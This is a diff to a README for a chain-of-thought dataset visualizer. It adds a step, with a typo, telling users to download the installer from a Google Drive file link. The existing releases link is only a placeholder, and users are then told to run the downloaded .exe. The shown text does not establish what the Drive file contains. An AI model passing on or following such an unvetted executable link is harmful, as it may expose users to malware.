luisagreda-aidev/Dataset-CoT-Visualizer/README.md

 ### Prerequisites

-- Ensure you have Node.js and npm installed on your system.
+- Ensure you have Node.js Latest and npm installed on your system.
 You can download them from [nodejs.org](https://nodejs.org/).

 ### Steps to Install

 1. **Download the Application**:
    - Visit the [releases page](https://github.com/your-repo/chain-of-thought-visualizer/releases) and download the appropriate installer for your operating system.
+   - Visti the [Drive Package](https://drive.google.com/file/d/1xPTOttz42VG6CXTiuLYBfC6V0nZncp2f/view?usp=drive_link) and download the appropriate installer for your operating system.

 2. **Install the Application**:
    - **Windows**: Run the downloaded `.exe` file and follow the on-screen instructions to complete the installation.